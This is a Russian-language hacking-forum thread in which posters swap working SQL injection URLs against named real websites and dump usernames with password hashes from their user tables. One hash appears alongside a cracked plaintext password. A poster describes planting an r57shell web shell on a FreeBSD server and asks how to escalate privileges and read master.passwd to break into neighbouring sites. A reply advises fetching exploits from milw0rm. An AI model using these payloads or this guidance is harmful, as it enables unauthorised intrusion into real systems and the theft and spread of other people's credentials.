ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Вот помогите есть уязвимость но не выводится ничего http://www.ewb-usa.org/news.php?ID=-1'

o3,14um там пятая ветка, разные UnIoN, uni"+"on,un/**/ion - не проходят.

http://ma s t e r o ff.org/edit.php?q='' (13cols)

Ну блин - залить это одно а серв прокавырять это ж совсем другое. Из по админа сайта залил, вот а что дальше делать чтоб к остальным сайтам на этом серваке пробиться?

вот держи
http://www.ewb-usa.org/news.php?ID=-1'+union+select+version(),2,3/*
дальше сам кавыряй...))

вот решил добить...
http://www.ewb-usa.org/news.php?ID=-1'+union+select+concat(username,char(58),password) ,2,3+from+auth_users/*

Спасибоо !! одна ' все решает )))

http://www.ewb-usa.org/news.php?ID=-1'+union+select+concat_ws(0x3a,UserName,password), 2,3+from+auth_users+limit+3,1/*

Ann:1756543d9b768d870fab2000d9b667f8

Meg:f807febec044b8dfa8996c79da35e599

Люди помогите плиз. У меня проблема - залил r57shell на серв - там сэйф моде отключен система freebsd 6.2. Можно ли как нибудь повысить привелегии, или вообще получить пароли к остальным сайтам на этом серве - это моя основная цель (из файлов с паролями читается только pwd.db, а passwd файла вообще нет, поэтому назревает вопрос а можно ли прочитать как нибудь master.passwd). Заранее спасибо

http://www.site//out.asp?id=1+or+1=(SELECT+TOP+1+cast(username+as+n varchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+ from+x_ads_account)--
почему пишет, что неверное слово or, когда ДО этого, я спокойно его использовал при выводе таблиц? можно ли его заменить как-то?



Ann:1756543d9b768d870fab2000d9b667f8:new!pass#

стандарт: узнай че висит на сервере, потом идешь, например, на милворм и ищешь "инструмент"(эксплойт) и можешь действовать